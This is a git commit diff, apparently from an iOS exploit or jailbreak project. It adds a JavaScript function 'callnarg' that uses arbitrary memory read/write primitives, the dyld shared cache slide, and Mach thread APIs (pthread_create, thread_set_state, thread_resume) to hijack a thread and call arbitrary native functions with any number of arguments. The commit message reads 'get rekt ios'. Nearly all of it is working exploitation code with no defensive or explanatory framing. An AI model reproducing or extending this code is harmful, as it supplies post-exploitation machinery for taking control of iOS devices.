diff options
| author | spv420 <unomilliono@gmail.com> | 2022-04-24 05:57:07 -0400 |
|---|---|---|
| committer | spv420 <unomilliono@gmail.com> | 2022-04-24 05:57:07 -0400 |
| commit | eab6e28c9e1b541c505e84ab64a148d6def984c9 (patch) | |
| tree | 8df4adfd893cfa14755b7f158817148bed94c79b /src/js/primitives/call.js | |
| parent | 36dd71290d6a4b7757adb9bbe59f876ada4cc6b8 (diff) | |
get rekt ios - as many fucking args as you want (need to work on return still, it'll run in a seperate thread rn async)
Diffstat (limited to 'src/js/primitives/call.js')
| -rw-r--r-- | src/js/primitives/call.js | 60 |
1 files changed, 60 insertions, 0 deletions
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js index 996f5a8..687e758 100644 --- a/src/js/primitives/call.js +++ b/src/js/primitives/call.js @@ -97,3 +97,63 @@ function calls4arg(sym, r0, r1, r2, r3) { } return call4arg(addy, r0, r1, r2, r3); } + +function callnarg() { + if (arguments.length < 1) { + return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length); + } + + mytask = 0; + count = 0x130000; + th = 0x130100; +// thread_state_ptr = 0x130008; + thread_state = 0x130200; + countptr = 0x131000; + thptr = 0x131004; + thread_stateptr = 0x131008; + thread = 0x130300; + threadptr = 0x132300; + threadptrptr = 0x133300; + + countptrptr = 0x132000; + thptrptr = 0x132004; + thread_stateptrptr = 0x132008; + + var stack_shit = 0x161000; + + write_u32(countptr, count); + write_u32(thptr, th); + write_u32(threadptr, thread); + write_u32(thread_stateptr, thread_state); + + write_u32(countptrptr, countptr); + write_u32(thptrptr, thptr); + write_u32(threadptrptr, threadptr); + write_u32(thread_stateptrptr, thread_stateptr); + + var addy = arguments[0]; + + var dyld_shc_slide = get_dyld_shc_slide(); + + write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide); + + calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0); + var thread = read_u32(threadptr); + write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); + + for (var i = 1; i < arguments.length; i++) { + if (i <= 4) { + write_u32(thread_state + ((i - 1) << 2), arguments[i]); + } else { + write_u32(stack_shit + ((i - 5) << 2), arguments[i]); + } + } + + write_u32(thread_state + (13 << 2), stack_shit); + write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide); + write_u32(thread_state + (15 << 2), addy); + write_u32(thread_state + (16 << 2), 0x40000020); + + calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT); + calls4arg("thread_resume", read_u32(th), 0, 0, 0); +}
\ No newline at end of file |